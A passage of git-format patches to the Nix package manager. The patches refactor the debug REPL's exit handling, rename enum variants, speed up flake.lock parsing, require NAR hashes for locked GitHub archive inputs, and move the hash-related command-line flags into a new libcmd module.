-    return true;
+    return ProcessLineResult::Continue;
 }
 
 void NixRepl::loadFile(const Path & path)
@@ -923,7 +954,7 @@ std::unique_ptr AbstractNixRepl::create(
 }
 
 
-void AbstractNixRepl::runSimple(
+ReplExitStatus AbstractNixRepl::runSimple(
     ref evalState,
     const ValMap & extraEnv)
 {
@@ -945,7 +976,7 @@ void AbstractNixRepl::runSimple(
     for (auto & [name, value] : extraEnv)
         repl->addVarToScope(repl->state->symbols.create(name), *value);
 
-    repl->mainLoop();
+    return repl->mainLoop();
 }
 
 }
diff --git a/src/libcmd/repl.hh b/src/libcmd/repl.hh
index 6d88883fe..21aa8bfc7 100644
--- a/src/libcmd/repl.hh
+++ b/src/libcmd/repl.hh
@@ -28,13 +28,13 @@ struct AbstractNixRepl
         const SearchPath & searchPath, nix::ref store, ref state,
         std::function getValues);
 
-    static void runSimple(
+    static ReplExitStatus runSimple(
         ref evalState,
         const ValMap & extraEnv);
 
     virtual void initEnv() = 0;
 
-    virtual void mainLoop() = 0;
+    virtual ReplExitStatus mainLoop() = 0;
 };
 
 }
diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 832c8369a..3de26bd1e 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -3,6 +3,7 @@
 #include "hash.hh"
 #include "primops.hh"
 #include "print-options.hh"
+#include "shared.hh"
 #include "types.hh"
 #include "util.hh"
 #include "store-api.hh"
@@ -416,7 +417,6 @@ EvalState::EvalState(
     , buildStore(buildStore ? buildStore : store)
     , debugRepl(nullptr)
     , debugStop(false)
-    , debugQuit(false)
     , trylevel(0)
     , regexCache(makeRegexCache())
 #if HAVE_BOEHMGC
@@ -792,7 +792,17 @@ void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr &
     auto se = getStaticEnv(expr);
     if (se) {
         auto vm = mapStaticEnvBindings(symbols, *se.get(), env);
-        (debugRepl)(ref(shared_from_this()), *vm);
+        auto exitStatus = (debugRepl)(ref(shared_from_this()), *vm);
+        switch (exitStatus) {
+            case ReplExitStatus::QuitAll:
+                if (error)
+                    throw *error;
+                throw Exit(0);
+            case ReplExitStatus::Continue:
+                break;
+            default:
+                abort();
+        }
     }
 }
 
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index 8e639a1fa..42fe0d3e4 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -11,6 +11,7 @@
 #include "experimental-features.hh"
 #include "input-accessor.hh"
 #include "search-path.hh"
+#include "repl-exit-status.hh"
 
 #include 
 #include 
@@ -219,9 +220,8 @@ public:
     /**
      * Debugger
      */
-    void (* debugRepl)(ref es, const ValMap & extraEnv);
+    ReplExitStatus (* debugRepl)(ref es, const ValMap & extraEnv);
     bool debugStop;
-    bool debugQuit;
     int trylevel;
     std::list debugTraces;
     std::map> exprEnvs;
@@ -758,7 +758,6 @@ struct DebugTraceStacker {
     DebugTraceStacker(EvalState & evalState, DebugTrace t);
     ~DebugTraceStacker()
     {
-        // assert(evalState.debugTraces.front() == trace);
         evalState.debugTraces.pop_front();
     }
     EvalState & evalState;
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 731485133..5b3b2f11a 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -760,15 +760,6 @@ static RegisterPrimOp primop_break({
 
             auto & dt = state.debugTraces.front();
             state.runDebugRepl(&error, dt.env, dt.expr);
-
-            if (state.debugQuit) {
-                // If the user elects to quit the repl, throw an exception.
-                throw Error(ErrorInfo{
-                    .level = lvlInfo,
-                    .msg = HintFmt("quit the debugger"),
-                    .pos = nullptr,
-                });
-            }
         }
 
         // Return the value we were passed.
@@ -879,7 +870,7 @@ static void prim_tryEval(EvalState & state, const PosIdx pos, Value * * args, Va
     /* increment state.trylevel, and decrement it when this function returns. */
     MaintainCount trylevel(state.trylevel);
 
-    void (* savedDebugRepl)(ref es, const ValMap & extraEnv) = nullptr;
+    ReplExitStatus (* savedDebugRepl)(ref es, const ValMap & extraEnv) = nullptr;
     if (state.debugRepl && evalSettings.ignoreExceptionsDuringTry)
     {
         /* to prevent starting the repl from exceptions withing a tryEval, null it. */
diff --git a/src/libexpr/repl-exit-status.hh b/src/libexpr/repl-exit-status.hh
new file mode 100644
index 000000000..08299ff61
--- /dev/null
+++ b/src/libexpr/repl-exit-status.hh
@@ -0,0 +1,20 @@
+#pragma once
+
+namespace nix {
+
+/**
+ * Exit status returned from the REPL.
+ */
+enum class ReplExitStatus {
+    /**
+     * The user exited with `:quit`. The program (e.g., if the REPL was acting
+     * as the debugger) should exit.
+     */
+    QuitAll,
+    /**
+     * The user exited with `:continue`. The program should continue running.
+     */
+    Continue,
+};
+
+}
diff --git a/src/libmain/shared.cc b/src/libmain/shared.cc
index 7b9b3c5b5..7bced0aa4 100644
--- a/src/libmain/shared.cc
+++ b/src/libmain/shared.cc
@@ -408,6 +408,4 @@ PrintFreed::~PrintFreed()
             showBytes(results.bytesFreed));
 }
 
-Exit::~Exit() { }
-
 }
diff --git a/src/libmain/shared.hh b/src/libmain/shared.hh
index c68f6cd83..99c3dffab 100644
--- a/src/libmain/shared.hh
+++ b/src/libmain/shared.hh
@@ -7,6 +7,7 @@
 #include "common-args.hh"
 #include "path.hh"
 #include "derived-path.hh"
+#include "exit.hh"
 
 #include 
 
@@ -15,15 +16,6 @@
 
 namespace nix {
 
-class Exit : public std::exception
-{
-public:
-    int status;
-    Exit() : status(0) { }
-    Exit(int status) : status(status) { }
-    virtual ~Exit();
-};
-
 int handleExceptions(const std::string & programName, std::function fun);
 
 /**
diff --git a/src/libutil/exit.cc b/src/libutil/exit.cc
new file mode 100644
index 000000000..73cd8b04e
--- /dev/null
+++ b/src/libutil/exit.cc
@@ -0,0 +1,7 @@
+#include "exit.hh"
+
+namespace nix {
+
+Exit::~Exit() {}
+
+}
diff --git a/src/libutil/exit.hh b/src/libutil/exit.hh
new file mode 100644
index 000000000..55f33e62f
--- /dev/null
+++ b/src/libutil/exit.hh
@@ -0,0 +1,19 @@
+#pragma once
+
+#include 
+
+namespace nix {
+
+/**
+ * Exit the program with a given exit code.
+ */
+class Exit : public std::exception
+{
+public:
+    int status;
+    Exit() : status(0) { }
+    explicit Exit(int status) : status(status) { }
+    virtual ~Exit();
+};
+
+}

From 8e71883e3f59100479e96aa1883ef52dbaa03fd3 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Tue, 20 Feb 2024 14:52:16 -0800
Subject: [PATCH 493/654] Rename `ProcessLineResult` variants

---
 src/libcmd/repl.cc | 22 +++++++++++-----------
 1 file changed, 11 insertions(+), 11 deletions(-)

diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index e423df3fe..42ec0f709 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -61,16 +61,16 @@ enum class ProcessLineResult {
      * program or evaluation (e.g., if the REPL was acting as the debugger)
      * should also exit.
      */
-    QuitAll,
+    Quit,
     /**
      * The user exited with `:continue`. The REPL should exit, but the program
      * should continue running.
      */
-    QuitOnce,
+    Continue,
     /**
      * The user did not exit. The REPL should request another line of input.
      */
-    Continue,
+    PromptAgain,
 };
 
 struct NixRepl
@@ -318,11 +318,11 @@ ReplExitStatus NixRepl::mainLoop()
         logger->resume();
         try {
             switch (processLine(input)) {
-                case ProcessLineResult::QuitAll:
+                case ProcessLineResult::Quit:
                     return ReplExitStatus::QuitAll;
-                case ProcessLineResult::QuitOnce:
-                    return ReplExitStatus::Continue;
                 case ProcessLineResult::Continue:
+                    return ReplExitStatus::Continue;
+                case ProcessLineResult::PromptAgain:
                     break;
                 default:
                     abort();
@@ -518,7 +518,7 @@ ProcessLineResult NixRepl::processLine(std::string line)
 {
     line = trim(line);
     if (line.empty())
-        return ProcessLineResult::Continue;
+        return ProcessLineResult::PromptAgain;
 
     _isInterrupted = false;
 
@@ -613,13 +613,13 @@ ProcessLineResult NixRepl::processLine(std::string line)
     else if (state->debugRepl && (command == ":s" || command == ":step")) {
         // set flag to stop at next DebugTrace; exit repl.
         state->debugStop = true;
-        return ProcessLineResult::QuitOnce;
+        return ProcessLineResult::Continue;
     }
 
     else if (state->debugRepl && (command == ":c" || command == ":continue")) {
         // set flag to run to next breakpoint or end of program; exit repl.
         state->debugStop = false;
-        return ProcessLineResult::QuitOnce;
+        return ProcessLineResult::Continue;
     }
 
     else if (command == ":a" || command == ":add") {
@@ -762,7 +762,7 @@ ProcessLineResult NixRepl::processLine(std::string line)
 
     else if (command == ":q" || command == ":quit") {
         state->debugStop = false;
-        return ProcessLineResult::QuitAll;
+        return ProcessLineResult::Quit;
     }
 
     else if (command == ":doc") {
@@ -823,7 +823,7 @@ ProcessLineResult NixRepl::processLine(std::string line)
         }
     }
 
-    return ProcessLineResult::Continue;
+    return ProcessLineResult::PromptAgain;
 }
 
 void NixRepl::loadFile(const Path & path)

From 60eeacc24a0d4dd8dabeb7fcf16b3aea5b8d3192 Mon Sep 17 00:00:00 2001
From: syvb 
Date: Tue, 20 Feb 2024 19:17:18 -0500
Subject: [PATCH 494/654] Say how many channels were unpacked

---
 src/nix-channel/nix-channel.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/nix-channel/nix-channel.cc b/src/nix-channel/nix-channel.cc
index 79db78236..48553fa31 100644
--- a/src/nix-channel/nix-channel.cc
+++ b/src/nix-channel/nix-channel.cc
@@ -138,7 +138,7 @@ static void update(const StringSet & channelNames)
 
     // Unpack the channel tarballs into the Nix store and install them
     // into the channels profile.
-    std::cerr << "unpacking channels...\n";
+    std::cerr << "unpacking " << exprs.size() << " channels...\n";
     Strings envArgs{ "--profile", profile, "--file", unpackChannelPath, "--install", "--remove-all", "--from-expression" };
     for (auto & expr : exprs)
         envArgs.push_back(std::move(expr));

From 7fd0de38c6e2c203e3f3c376dcf9a48424d216fe Mon Sep 17 00:00:00 2001
From: Graham Dennis 
Date: Wed, 21 Feb 2024 18:40:34 +1100
Subject: [PATCH 495/654] Faster flake.lock parsing

This PR reduces the creation of short-lived basic_json objects while
parsing flake.lock files. For large flake.lock files (~1.5MB) I was
observing ~60s being spent for trivial nix build operations while
after this change it is now taking ~1.6s.
---
 src/libexpr/flake/lockfile.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libexpr/flake/lockfile.cc b/src/libexpr/flake/lockfile.cc
index 3e99fb2d4..58ebd97ba 100644
--- a/src/libexpr/flake/lockfile.cc
+++ b/src/libexpr/flake/lockfile.cc
@@ -107,7 +107,7 @@ LockFile::LockFile(const nlohmann::json & json, const Path & path)
                 std::string inputKey = i.value();
                 auto k = nodeMap.find(inputKey);
                 if (k == nodeMap.end()) {
-                    auto nodes = json["nodes"];
+                    auto & nodes = json["nodes"];
                     auto jsonNode2 = nodes.find(inputKey);
                     if (jsonNode2 == nodes.end())
                         throw Error("lock file references missing node '%s'", inputKey);

From 09d76e512a468ad65bedaeda56871de7043849b0 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Wed, 21 Feb 2024 12:08:18 +0100
Subject: [PATCH 496/654] GitArchiveInputScheme: Require a NAR hash

---
 src/libfetchers/github.cc | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc
index 76f94337b..a48c99a0b 100644
--- a/src/libfetchers/github.cc
+++ b/src/libfetchers/github.cc
@@ -282,7 +282,11 @@ struct GitArchiveInputScheme : InputScheme
 
     bool isLocked(const Input & input) const override
     {
-        return (bool) input.getRev();
+        /* Since we can't verify the integrity of the tarball from the
+           Git revision alone, we also require a NAR hash for
+           locking. FIXME: in the future, we may want to require a Git
+           tree hash instead of a NAR hash. */
+        return input.getRev().has_value() && input.getNarHash().has_value();
     }
 
     std::optional experimentalFeature() const override

From b111fba8cd3c5d492565b5dc22a493ed58ef8571 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Wed, 21 Feb 2024 09:07:39 -0800
Subject: [PATCH 497/654] Add documentation, rename to `debugger-on-trace`

---
 doc/manual/rl-next/debugger-on-trace.md |  4 ++--
 src/libexpr/eval-settings.hh            | 11 +++++++++--
 src/libexpr/primops.cc                  |  6 ++++++
 3 files changed, 17 insertions(+), 4 deletions(-)

diff --git a/doc/manual/rl-next/debugger-on-trace.md b/doc/manual/rl-next/debugger-on-trace.md
index d4e55d59c..721928550 100644
--- a/doc/manual/rl-next/debugger-on-trace.md
+++ b/doc/manual/rl-next/debugger-on-trace.md
@@ -1,9 +1,9 @@
 ---
-synopsis: Enter the `--debugger` when `builtins.trace` is called if `builtins-trace-debugger` is set
+synopsis: Enter the `--debugger` when `builtins.trace` is called if `debugger-on-trace` is set
 prs: 9914
 ---
 
-If the `builtins-trace-debugger` option is set and `--debugger` is given,
+If the `debugger-on-trace` option is set and `--debugger` is given,
 `builtins.trace` calls will behave similarly to `builtins.break` and will enter
 the debug REPL. This is useful for determining where warnings are being emitted
 from.
diff --git a/src/libexpr/eval-settings.hh b/src/libexpr/eval-settings.hh
index 757daebc0..b5783d28f 100644
--- a/src/libexpr/eval-settings.hh
+++ b/src/libexpr/eval-settings.hh
@@ -128,8 +128,15 @@ struct EvalSettings : Config
     Setting maxCallDepth{this, 10000, "max-call-depth",
         "The maximum function call depth to allow before erroring."};
 
-    Setting builtinsTraceDebugger{this, false, "builtins-trace-debugger",
-        "Whether to enter the debugger on `builtins.trace` calls."};
+    Setting builtinsTraceDebugger{this, false, "debugger-on-trace",
+        R"(
+          If set to true and the `--debugger` flag is given,
+          [`builtins.trace`](@docroot@/language/builtins.md#builtins-trace) will
+          enter the debugger like
+          [`builtins.break`](@docroot@/language/builtins.md#builtins-break).
+
+          This is useful for debugging warnings in third-party Nix code.
+        )"};
 };
 
 extern EvalSettings evalSettings;
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index a24a2d018..0ee146359 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -1010,6 +1010,12 @@ static RegisterPrimOp primop_trace({
       Evaluate *e1* and print its abstract syntax representation on
       standard error. Then return *e2*. This function is useful for
       debugging.
+
+      If the
+      [`debugger-on-trace`](@docroot@/command-ref/conf-file.md#conf-debugger-on-trace)
+      option is set to `true` and the `--debugger` flag is given, the
+      interactive debugger will be started when `trace` is called (like
+      [`break`](@docroot@/language/builtins.md#builtins-break)).
     )",
     .fun = prim_trace,
 });

From efd36b49e84335f324c9d4c2dcd511f126aa4d60 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Fri, 19 Jan 2024 21:11:56 -0500
Subject: [PATCH 498/654] `nix hash path`, and preperatory refactors

- `nix store add` supports text hashing

  With functional test ensuring it matches `builtins.toFile`.

- Factored-out flags for both commands

- Move all common reusable flags to `libcmd`

  - They are not part of the *definition* of the CLI infra, just a usag
    of it.

  - The `libstore` flag couldn't go in `args.hh` in libutil anyways,
    would be awkward for it to live alone

- Shuffle around `Cmd*` hierarchy so flags for deprecated commands don't
  end up on the new ones
---
 src/libcmd/misc-store-flags.cc | 121 +++++++++++++++++++++++++++++++++
 src/libcmd/misc-store-flags.hh |  21 ++++++
 src/libutil/args.cc            |  67 ------------------
 src/libutil/args.hh            |  19 +++---
 src/nix/add-to-store.cc        |  20 +-----
 src/nix/hash.cc                |  99 ++++++++++++++++++---------
 src/nix/prefetch.cc            |   3 +-
 tests/functional/add.sh        |   5 ++
 tests/functional/hash-path.sh  |  28 +++++---
 9 files changed, 245 insertions(+), 138 deletions(-)
 create mode 100644 src/libcmd/misc-store-flags.cc
 create mode 100644 src/libcmd/misc-store-flags.hh

diff --git a/src/libcmd/misc-store-flags.cc b/src/libcmd/misc-store-flags.cc
new file mode 100644
index 000000000..e66d3f63b
--- /dev/null
+++ b/src/libcmd/misc-store-flags.cc
@@ -0,0 +1,121 @@
+#include "misc-store-flags.hh"
+
+namespace nix::flag
+{
+
+static void hashFormatCompleter(AddCompletions & completions, size_t index, std::string_view prefix)
+{
+    for (auto & format : hashFormats) {
+        if (hasPrefix(format, prefix)) {
+            completions.add(format);
+        }
+    }
+}
+
+Args::Flag hashFormatWithDefault(std::string && longName, HashFormat * hf)
+{
+    assert(*hf == nix::HashFormat::SRI);
+    return Args::Flag {
+            .longName = std::move(longName),
+            .description = "Hash format (`base16`, `nix32`, `base64`, `sri`). Default: `sri`.",
+            .labels = {"hash-format"},
+            .handler = {[hf](std::string s) {
+                *hf = parseHashFormat(s);
+            }},
+            .completer = hashFormatCompleter,
+    };
+}
+
+Args::Flag hashFormatOpt(std::string && longName, std::optional * ohf)
+{
+    return Args::Flag {
+            .longName = std::move(longName),
+            .description = "Hash format (`base16`, `nix32`, `base64`, `sri`).",
+            .labels = {"hash-format"},
+            .handler = {[ohf](std::string s) {
+                *ohf = std::optional{parseHashFormat(s)};
+            }},
+            .completer = hashFormatCompleter,
+    };
+}
+
+static void hashAlgoCompleter(AddCompletions & completions, size_t index, std::string_view prefix)
+{
+    for (auto & algo : hashAlgorithms)
+        if (hasPrefix(algo, prefix))
+            completions.add(algo);
+}
+
+Args::Flag hashAlgo(std::string && longName, HashAlgorithm * ha)
+{
+    return Args::Flag {
+            .longName = std::move(longName),
+            .description = "Hash algorithm (`md5`, `sha1`, `sha256`, or `sha512`).",
+            .labels = {"hash-algo"},
+            .handler = {[ha](std::string s) {
+                *ha = parseHashAlgo(s);
+            }},
+            .completer = hashAlgoCompleter,
+    };
+}
+
+Args::Flag hashAlgoOpt(std::string && longName, std::optional * oha)
+{
+    return Args::Flag {
+            .longName = std::move(longName),
+            .description = "Hash algorithm (`md5`, `sha1`, `sha256`, or `sha512`). Can be omitted for SRI hashes.",
+            .labels = {"hash-algo"},
+            .handler = {[oha](std::string s) {
+                *oha = std::optional{parseHashAlgo(s)};
+            }},
+            .completer = hashAlgoCompleter,
+    };
+}
+
+Args::Flag fileIngestionMethod(FileIngestionMethod * method)
+{
+    return Args::Flag {
+        .longName  = "mode",
+        // FIXME indentation carefully made for context, this is messed up.
+        .description = R"(
+    How to compute the hash of the input.
+    One of:
+
+    - `nar` (the default): Serialises the input as an archive (following the [_Nix Archive Format_](https://edolstra.github.io/pubs/phd-thesis.pdf#page=101)) and passes that to the hash function.
+
+    - `flat`: Assumes that the input is a single file and directly passes it to the hash function;
+        )",
+        .labels = {"file-ingestion-method"},
+        .handler = {[method](std::string s) {
+            *method = parseFileIngestionMethod(s);
+        }},
+    };
+}
+
+Args::Flag contentAddressMethod(ContentAddressMethod * method)
+{
+    return Args::Flag {
+        .longName  = "mode",
+        // FIXME indentation carefully made for context, this is messed up.
+        .description = R"(
+    How to compute the content-address of the store object.
+    One of:
+
+    - `nar` (the default): Serialises the input as an archive (following the [_Nix Archive Format_](https://edolstra.github.io/pubs/phd-thesis.pdf#page=101)) and passes that to the hash function.
+
+    - `flat`: Assumes that the input is a single file and directly passes it to the hash function;
+
+    - `text`: Like `flat`, but used for
+      [derivations](@docroot@/glossary.md#store-derivation) serialized in store object and 
+      [`builtins.toFile`](@docroot@/language/builtins.html#builtins-toFile).
+      For advanced use-cases only;
+      for regular usage prefer `nar` and `flat.
+        )",
+        .labels = {"content-address-method"},
+        .handler = {[method](std::string s) {
+            *method = ContentAddressMethod::parse(s);
+        }},
+    };
+}
+
+}
diff --git a/src/libcmd/misc-store-flags.hh b/src/libcmd/misc-store-flags.hh
new file mode 100644
index 000000000..124372af7
--- /dev/null
+++ b/src/libcmd/misc-store-flags.hh
@@ -0,0 +1,21 @@
+#include "args.hh"
+#include "content-address.hh"
+
+namespace nix::flag {
+
+Args::Flag hashAlgo(std::string && longName, HashAlgorithm * ha);
+static inline Args::Flag hashAlgo(HashAlgorithm * ha)
+{
+    return hashAlgo("hash-algo", ha);
+}
+Args::Flag hashAlgoOpt(std::string && longName, std::optional * oha);
+Args::Flag hashFormatWithDefault(std::string && longName, HashFormat * hf);
+Args::Flag hashFormatOpt(std::string && longName, std::optional * ohf);
+static inline Args::Flag hashAlgoOpt(std::optional * oha)
+{
+    return hashAlgoOpt("hash-algo", oha);
+}
+Args::Flag fileIngestionMethod(FileIngestionMethod * method);
+Args::Flag contentAddressMethod(ContentAddressMethod * method);
+
+}
diff --git a/src/libutil/args.cc b/src/libutil/args.cc
index 8996cbe5b..a981ed9fb 100644
--- a/src/libutil/args.cc
+++ b/src/libutil/args.cc
@@ -544,73 +544,6 @@ nlohmann::json Args::toJSON()
     return res;
 }
 
-static void hashFormatCompleter(AddCompletions & completions, size_t index, std::string_view prefix)
-{
-    for (auto & format : hashFormats) {
-        if (hasPrefix(format, prefix)) {
-            completions.add(format);
-        }
-    }
-}
-
-Args::Flag Args::Flag::mkHashFormatFlagWithDefault(std::string &&longName, HashFormat * hf) {
-    assert(*hf == nix::HashFormat::SRI);
-    return Flag{
-            .longName = std::move(longName),
-            .description = "Hash format (`base16`, `nix32`, `base64`, `sri`). Default: `sri`.",
-            .labels = {"hash-format"},
-            .handler = {[hf](std::string s) {
-                *hf = parseHashFormat(s);
-            }},
-            .completer = hashFormatCompleter,
-    };
-}
-
-Args::Flag Args::Flag::mkHashFormatOptFlag(std::string && longName, std::optional * ohf) {
-    return Flag{
-            .longName = std::move(longName),
-            .description = "Hash format (`base16`, `nix32`, `base64`, `sri`).",
-            .labels = {"hash-format"},
-            .handler = {[ohf](std::string s) {
-                *ohf = std::optional{parseHashFormat(s)};
-            }},
-            .completer = hashFormatCompleter,
-    };
-}
-
-static void hashAlgoCompleter(AddCompletions & completions, size_t index, std::string_view prefix)
-{
-    for (auto & algo : hashAlgorithms)
-        if (hasPrefix(algo, prefix))
-            completions.add(algo);
-}
-
-Args::Flag Args::Flag::mkHashAlgoFlag(std::string && longName, HashAlgorithm * ha)
-{
-    return Flag{
-            .longName = std::move(longName),
-            .description = "Hash algorithm (`md5`, `sha1`, `sha256`, or `sha512`).",
-            .labels = {"hash-algo"},
-            .handler = {[ha](std::string s) {
-                *ha = parseHashAlgo(s);
-            }},
-            .completer = hashAlgoCompleter,
-    };
-}
-
-Args::Flag Args::Flag::mkHashAlgoOptFlag(std::string && longName, std::optional * oha)
-{
-    return Flag{
-            .longName = std::move(longName),
-            .description = "Hash algorithm (`md5`, `sha1`, `sha256`, or `sha512`). Can be omitted for SRI hashes.",
-            .labels = {"hash-algo"},
-            .handler = {[oha](std::string s) {
-                *oha = std::optional{parseHashAlgo(s)};
-            }},
-            .completer = hashAlgoCompleter,
-    };
-}
-
 static void _completePath(AddCompletions & completions, std::string_view prefix, bool onlyDirs)
 {
     completions.setType(Completions::Type::Filenames);
diff --git a/src/libutil/args.hh b/src/libutil/args.hh
index 6c9c48065..4b2e1d960 100644
--- a/src/libutil/args.hh
+++ b/src/libutil/args.hh
@@ -155,6 +155,8 @@ protected:
      */
     using CompleterClosure = std::function;
 
+public:
+
     /**
      * Description of flags / options
      *
@@ -175,19 +177,10 @@ protected:
         CompleterClosure completer;
 
         std::optional experimentalFeature;
-
-        static Flag mkHashAlgoFlag(std::string && longName, HashAlgorithm * ha);
-        static Flag mkHashAlgoFlag(HashAlgorithm * ha) {
-            return mkHashAlgoFlag("hash-algo", ha);
-        }
-        static Flag mkHashAlgoOptFlag(std::string && longName, std::optional * oha);
-        static Flag mkHashAlgoOptFlag(std::optional * oha) {
-            return mkHashAlgoOptFlag("hash-algo", oha);
-        }
-        static Flag mkHashFormatFlagWithDefault(std::string && longName, HashFormat * hf);
-        static Flag mkHashFormatOptFlag(std::string && longName, std::optional * ohf);
     };
 
+protected:
+
     /**
      * Index of all registered "long" flag descriptions (flags like
      * `--long`).
@@ -206,6 +199,8 @@ protected:
      */
     virtual bool processFlag(Strings::iterator & pos, Strings::iterator end);
 
+public:
+
     /**
      * Description of positional arguments
      *
@@ -220,6 +215,8 @@ protected:
         CompleterClosure completer;
     };
 
+protected:
+
     /**
      * Queue of expected positional argument forms.
      *
diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc
index 9ea37ab4c..ca2daecab 100644
--- a/src/nix/add-to-store.cc
+++ b/src/nix/add-to-store.cc
@@ -3,6 +3,7 @@
 #include "store-api.hh"
 #include "archive.hh"
 #include "posix-source-accessor.hh"
+#include "misc-store-flags.hh"
 
 using namespace nix;
 
@@ -26,23 +27,9 @@ struct CmdAddToStore : MixDryRun, StoreCommand
             .handler = {&namePart},
         });
 
-        addFlag({
-            .longName  = "mode",
-            .description = R"(
-    How to compute the hash of the input.
-    One of:
+        addFlag(flag::contentAddressMethod(&caMethod));
 
-    - `nar` (the default): Serialises the input as an archive (following the [_Nix Archive Format_](https://edolstra.github.io/pubs/phd-thesis.pdf#page=101)) and passes that to the hash function.
-
-    - `flat`: Assumes that the input is a single file and directly passes it to the hash function;
-            )",
-            .labels = {"hash-mode"},
-            .handler = {[this](std::string s) {
-                this->caMethod = parseFileIngestionMethod(s);
-            }},
-        });
-
-        addFlag(Flag::mkHashAlgoFlag(&hashAlgo));
+        addFlag(flag::hashAlgo(&hashAlgo));
     }
 
     void run(ref store) override
@@ -63,7 +50,6 @@ struct CmdAddToStore : MixDryRun, StoreCommand
 
 struct CmdAdd : CmdAddToStore
 {
-
     std::string description() override
     {
         return "Add a file or directory to the Nix store";
diff --git a/src/nix/hash.cc b/src/nix/hash.cc
index eec1c0eae..98d227f0e 100644
--- a/src/nix/hash.cc
+++ b/src/nix/hash.cc
@@ -6,11 +6,12 @@
 #include "references.hh"
 #include "archive.hh"
 #include "posix-source-accessor.hh"
+#include "misc-store-flags.hh"
 
 using namespace nix;
 
 /**
- * Base for `nix hash file` (deprecated), `nix hash path` and `nix-hash` (legacy).
+ * Base for `nix hash path`, `nix hash file` (deprecated), and `nix-hash` (legacy).
  *
  * Deprecation Issue: https://github.com/NixOS/nix/issues/8876
  */
@@ -19,12 +20,21 @@ struct CmdHashBase : Command
     FileIngestionMethod mode;
     HashFormat hashFormat = HashFormat::SRI;
     bool truncate = false;
-    HashAlgorithm ha = HashAlgorithm::SHA256;
+    HashAlgorithm hashAlgo = HashAlgorithm::SHA256;
     std::vector paths;
     std::optional modulus;
 
     explicit CmdHashBase(FileIngestionMethod mode) : mode(mode)
     {
+        expectArgs({
+            .label = "paths",
+            .handler = {&paths},
+            .completer = completePath
+        });
+
+        // FIXME The following flags should be deprecated, but we don't
+        // yet have a mechanism for that.
+
         addFlag({
             .longName = "sri",
             .description = "Print the hash in SRI format.",
@@ -49,22 +59,7 @@ struct CmdHashBase : Command
             .handler = {&hashFormat, HashFormat::Base16},
         });
 
-        addFlag(Flag::mkHashAlgoFlag("type", &ha));
-
-        #if 0
-        addFlag({
-            .longName = "modulo",
-            .description = "Compute the hash modulo the specified string.",
-            .labels = {"modulus"},
-            .handler = {&modulus},
-        });
-        #endif\
-
-        expectArgs({
-            .label = "paths",
-            .handler = {&paths},
-            .completer = completePath
-        });
+        addFlag(flag::hashAlgo("type", &hashAlgo));
     }
 
     std::string description() override
@@ -85,9 +80,9 @@ struct CmdHashBase : Command
 
             std::unique_ptr hashSink;
             if (modulus)
-                hashSink = std::make_unique(ha, *modulus);
+                hashSink = std::make_unique(hashAlgo, *modulus);
             else
-                hashSink = std::make_unique(ha);
+                hashSink = std::make_unique(hashAlgo);
 
             auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(path);
             dumpPath(accessor, canonPath, *hashSink, mode);
@@ -99,15 +94,53 @@ struct CmdHashBase : Command
     }
 };
 
+/**
+ * `nix hash path`
+ */
+struct CmdHashPath : CmdHashBase
+{
+    CmdHashPath()
+        : CmdHashBase(FileIngestionMethod::Recursive)
+    {
+        addFlag(flag::hashAlgo("algo", &hashAlgo));
+        addFlag(flag::fileIngestionMethod(&mode));
+        addFlag(flag::hashFormatWithDefault("format", &hashFormat));
+        #if 0
+        addFlag({
+            .longName = "modulo",
+            .description = "Compute the hash modulo the specified string.",
+            .labels = {"modulus"},
+            .handler = {&modulus},
+        });
+        #endif
+    }
+};
+
+/**
+ * For deprecated `nix hash file`
+ *
+ * Deprecation Issue: https://github.com/NixOS/nix/issues/8876
+ */
+struct CmdHashFile : CmdHashBase
+{
+    CmdHashFile()
+        : CmdHashBase(FileIngestionMethod::Flat)
+    {
+    }
+};
+
+/**
+ * For deprecated `nix hash to-*`
+ */
 struct CmdToBase : Command
 {
     HashFormat hashFormat;
-    std::optional ht;
+    std::optional hashAlgo;
     std::vector args;
 
     CmdToBase(HashFormat hashFormat) : hashFormat(hashFormat)
     {
-        addFlag(Flag::mkHashAlgoOptFlag("type", &ht));
+        addFlag(flag::hashAlgoOpt("type", &hashAlgo));
         expectArgs("strings", &args);
     }
 
@@ -124,7 +157,7 @@ struct CmdToBase : Command
     {
         warn("The old format conversion sub commands of `nix hash` where deprecated in favor of `nix hash convert`.");
         for (auto s : args)
-            logger->cout(Hash::parseAny(s, ht).to_string(hashFormat, hashFormat == HashFormat::SRI));
+            logger->cout(Hash::parseAny(s, hashAlgo).to_string(hashFormat, hashFormat == HashFormat::SRI));
     }
 };
 
@@ -139,9 +172,9 @@ struct CmdHashConvert : Command
     std::vector hashStrings;
 
     CmdHashConvert(): to(HashFormat::SRI) {
-        addFlag(Args::Flag::mkHashFormatOptFlag("from", &from));
-        addFlag(Args::Flag::mkHashFormatFlagWithDefault("to", &to));
-        addFlag(Args::Flag::mkHashAlgoOptFlag(&algo));
+        addFlag(flag::hashFormatOpt("from", &from));
+        addFlag(flag::hashFormatWithDefault("to", &to));
+        addFlag(flag::hashAlgoOpt(&algo));
         expectArgs({
            .label = "hashes",
            .handler = {&hashStrings},
@@ -181,8 +214,8 @@ struct CmdHash : NixMultiCommand
             "hash",
             {
                 {"convert", []() { return make_ref();}},
